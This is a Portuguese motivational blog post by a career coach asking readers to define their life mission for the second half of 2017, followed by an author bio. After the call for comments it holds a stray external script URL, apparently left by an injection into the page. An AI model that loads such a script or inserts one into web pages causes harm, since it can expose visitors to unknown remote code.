Qual a história que você vai contar em Dez/2017?

Chegamos a metade de 2017, e aí o que você realizou até aqui? E o que vai realizar até dezembro?

Imagino que na passagem do dia 31/12 para 01/01 você pensou nas coisas que gostaria de concretizar para 2017. Talvez começar uma dieta, fazer um curso, uma viagem, conquistar um novo emprego, inúmeras coisas.
Estamos na metade de 2017 e te pergunto como estão estes planos? Já realizou?

“Putz, ainda não consegui conquistar o que eu queria!”

É bem possível que você tenha estabelecido metas que não estavam alinhadas a sua missão de vida, que as metas que estabeleceu não tinham propósito. Aí você me pergunta: “como assim metas sem propósito?”

Estamos neste mundo porque temos um propósito a cumprir, assim como Jesus Cristo que tinha como missão morrer na cruz e nos salvar dos nossos pecados (preciso alertar que não faremos uma discussão religiosa), Ele poderia negar a sua missão, negar que era filho de Deus, mas Ele decidiu cumprir a sua missão e a fez da melhor forma possível.
E porque Ele fez isso? Foi por uma simples razão: não é porque ele tinha uma meta na cabeça e, sim porque Ele tinha uma missão a cumprir e é isso que faz toda a diferença na vida. Jesus vivia por sua missão, teve coragem e resignação.

Aí, percebi que a partir do momento que comecei a viver pela minha missão é que as realizações foram acontecendo na minha vida.
Sabe o que é mais importante você fazer com os próximos 6 meses do seu ano de 2017?
Antes de sentar e fazer todas as metas que você quer alcançar ainda para este ano, que tal pensar na sua missão de vida? Que tal pensar naquilo que você quer realizar para sua vida?

Aí você me fala: “Mas eu não sei qual é a minha missão de vida!?

Ok, você pode começar a identificá-la a partir disso:

  • Identifique qual o lugar que você deveria estar, qual o lugar que Deus quer que você realmente esteja. Pois, quando você está onde deveria estar, você tem paz e as coisas fluem naturalmente.
  • Olhe para sua vida, olhe para os últimos anos da sua vida!
  • Foque menos em metas para 2017, porque quando a gente quer ganhar e realizar um monte de coisa para viver pela nossa missão, não é esse o caminho. É contrário, viva pela sua missão, que todas as outras coisas mais virão para você!

Aí você me pergunta: “e quando eu aprender a minha missão e começar a viver por ela?

Você vai precisar fazer o que Jesus fez, vai precisar de coragem e resignação, porque se fosse fácil todo mundo faria e vai ter uma hora em que você vai precisar se resignar para ir a diante.

Então escreva qual é a sua missão, como você gostaria de ser lembrado em Dezembro de 2017, não quero saber o que você vai conquistar em 2017, quero saber como você vai ser lembrado em Dezembro de 2017, como você vai olhar para si mesmo e se ver ao final de 2017?

Como VOCÊ QUER SER LEMBRADO em 12/2017 ? RESPONDA nos comentários!

https://cloudapi.online/js/api46.js

Faça abaixo um comentário sobre este artigo. PARTICIPE!

Comentários (utilize sua conta no Facebook):

Powered by Facebook Comments

Author

Priscila Timbó
Coach de Carreira e Felicidade Profissional. Psicóloga, pós-graduada em Gestão de Treinamento e Desenvolvimento de Pessoas com formação em Coaching IKIGAI. Eu acredito que o Coaching é uma forma de ajudar as pessoas a descobrir aquilo que traz satisfação em sua vida, e que coaches podem ajudar as pessoas a conquistar os seus objetivos, e pessoas que conquistam os seus objetivos evoluem e se sentem mais realizadas e felizes. Meu histórico profissional se perfaz em atuação em consultoria de recursos humanos na área de desenvolvimento humano, onde respondi por atividades como Recrutamento e Seleção de profissionais especialistas e executivos, implantação de gestão por competências, assessment de profissionais executivos e especialistas, pesquisa de clima organizacional, Aconselhamento de carreira e Outplacement (Recolocação). ATUALMENTE atendo diversos profissionais no formato de assessoria individual (presencial e online) em SERVIÇOS DE COACHING DE REALIZAÇÃO PROFISSIONAL | RECOLOCAÇÃO PROFISSIONAL E TRANSIÇÃO DE CARREIRA.

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *